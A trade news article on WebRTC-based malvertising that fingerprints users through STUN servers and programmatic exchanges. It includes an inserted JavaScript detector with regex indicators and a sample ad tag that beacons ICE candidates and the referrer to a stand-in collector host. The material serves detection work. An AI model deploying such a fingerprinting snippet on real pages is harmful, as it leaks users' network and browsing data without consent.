
Bad Actors Are Taking Advantage Of Genuine Web Infrastructure To Hide The Spread Of Malware


When people join a browser-based video conference call, their top worry is usually whether their hair looks OK.

But there’s a bigger concern lurking.

WebRTC, the open source technology used by browsers and apps to enable real-time communications over the internet, is being exploited to camouflage the dissemination of malware-infected ads.

Programmatic exchanges appear to be the main and unwitting distribution point for malware spread through the manipulation of the WebRTC protocol, according to Israeli ad security company GeoEdge, which first encountered the scheme in October 2018. About 87% of the attacks observed by GeoEdge have taken place through header bidding auctions outside of a publisher’s primary ad server.

GeoEdge estimates publishers will lose around $325 million in 2019 due to WebRTC malvertising.

Cybersecurity startup DEVCON, which also discovered the WebRTC vulnerability late last year, has noticed a substantial increase in its exploitation over the last two weeks, said company CEO and founder Maggie Louie.

When an advertiser wins a programmatic auction in a legitimate scenario, an ad is served with a JavaScript tag to render it.

But with WebRTC malvertising, bad actors misuse the protocol by launching a script that extracts information about a user’s browser, including the local IP address and referring URL, to determine whether a machine belongs to a security researcher or if there’s a verification vendor afoot.

If fraudsters suspect that a session is being monitored for malicious activity, they won’t attack. But if the coast is clear, they insert malicious code into a piece of ad creative – usually one that was just stolen from around the internet – and serve that ad through a legitimate ad exchange.

From there, a user is often forcibly redirected to known spam and phishing sites. (“You just won an Amazon gift card!”)

The practice is particularly tricky to detect and intercept, because traditional domain-based security methods don’t apply, said GeoEdge CEO Amnon Siev.


WebRTC relies on legit third-party servers, known as STUN (Session Traversal Utilities for Network Address Translators) servers, to function and power peer-to-peer communication. The servers are also backed and used by valid entities such as Google, Mozilla and Microsoft.

That means the attacks are being launched through a benign entity, and there’s no domain to blacklist. Blocking an entire STUN server would cut off a lot of bona fide activity.

And so GeoEdge uses behavioral heuristics, or analyses, to observe how ad creative performs in the wild.

If something looks amiss, GeoEdge’s manual research team, made up of former Israeli army security experts, analyzes the code to identify specific exploits or the mechanisms of an attack. GeoEdge uses that information to create a signature for the exploit and block the specific programmatic tag.
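As an added illustration of the signature approach described above (this is not GeoEdge's or DEVCON's code), here is a small JavaScript heuristic of the kind an ad quality team could run over a creative's script before it renders: it flags the combination the article describes, WebRTC peer-connection and STUN calls sitting next to a referrer read and an outbound call. The indicator names, weights, thresholds and the two sample tags are constructed for this example.

```javascript
// Indicators of WebRTC-based fingerprinting inside an ad creative.
// Names and weights are assumptions chosen for this example, not a vendor's signature set.
const INDICATORS = [
  { id: "peer_connection", weight: 2, re: /(?:webkit|moz)?RTCPeerConnection\s*\(/ },
  { id: "stun_server",     weight: 2, re: /["']stuns?:[^"']+["']/ },
  { id: "ice_candidate",   weight: 2, re: /onicecandidate|addEventListener\(\s*["']icecandidate["']/ },
  { id: "data_channel",    weight: 1, re: /createDataChannel\s*\(/ },
  { id: "referrer_read",   weight: 1, re: /document\.referrer/ },
  { id: "outbound_call",   weight: 1, re: /\b(?:fetch|XMLHttpRequest|sendBeacon|new Image)\b/ },
];

// Scan one creative's JavaScript and return the matched indicators, a score and a verdict.
function scanCreative(script) {
  const matched = INDICATORS.filter((i) => i.re.test(script));
  const hits = matched.map((i) => i.id);
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  // A hard "block" requires an actual peer-connection primitive, so a tag that merely
  // mentions a STUN URL (for example in a comment or config string) only goes to review.
  const usesWebRtc = hits.includes("peer_connection");
  let verdict = "allow";
  if (usesWebRtc && score >= 5) verdict = "block";
  else if (score >= 3) verdict = "review";
  return { hits, score, verdict };
}

// Constructed sample tags (not real ad creatives). The suspicious one is a fragment only:
// it never creates an offer, so it would not actually gather ICE candidates if run.
const SUSPICIOUS_TAG = `
  var pc = new RTCPeerConnection({ iceServers: [{ urls: "stun:stun.example.invalid" }] });
  pc.createDataChannel("");
  pc.onicecandidate = function (e) { if (e.candidate) report(e.candidate.candidate, document.referrer); };
  function report(c, r) { navigator.sendBeacon("https://collector.example.invalid/c", c + "|" + r); }
`;
const BENIGN_TAG = `
  var img = document.createElement("img");
  img.src = "https://cdn.example.invalid/banner.png";
  img.onclick = function () { location.href = "https://advertiser.example.invalid/?ref=" + encodeURIComponent(document.referrer); };
  document.getElementById("ad-slot").appendChild(img);
`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(scanCreative(SUSPICIOUS_TAG)); // verdict: "block"
  console.log(scanCreative(BENIGN_TAG));     // verdict: "allow"
}
```

Reading the referrer alone is normal for click tracking, which is why it carries a low weight; the verdict only hardens when it appears together with the WebRTC primitives.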

Siev claims that six out of the 10 biggest exchanges and supply-side platforms were inadvertent conduits for WebRTC malvertising.

It’s a losing proposition for publishers. When users have a disagreeable or unexpected site experience, it leaves a bad taste in their mouth that they’ll most likely blame on the publisher.

PubGalaxy, a Bulgarian company that runs a programmatic platform for publishers, experiences this worry firsthand, because it also operates the technology website phonearena.com. (The site launched in 2001, and PubGalaxy was founded in 2013 to develop monetization tools based on the notion that a publisher knows what a publisher needs.)

“Our primary concern is the experience we provide to our readers. With the escalation of malicious ad attacks, bad user experiences are becoming a true concern for us,” said Ivan Ivanov, who ran biz dev for PhoneArena before becoming COO of PubGalaxy five years ago.

PubGalaxy has its own in-house ad quality team and partners with GeoEdge to block malicious ads. Every time a new type of exploit sneaks onto the scene, it’s a reminder that if there’s a vulnerability, someone will take advantage of it.

“This type of malvertising creates quite a disruption for us,” Ivanov said. “And it’s clear that the attacks will get even more sophisticated in the future.”
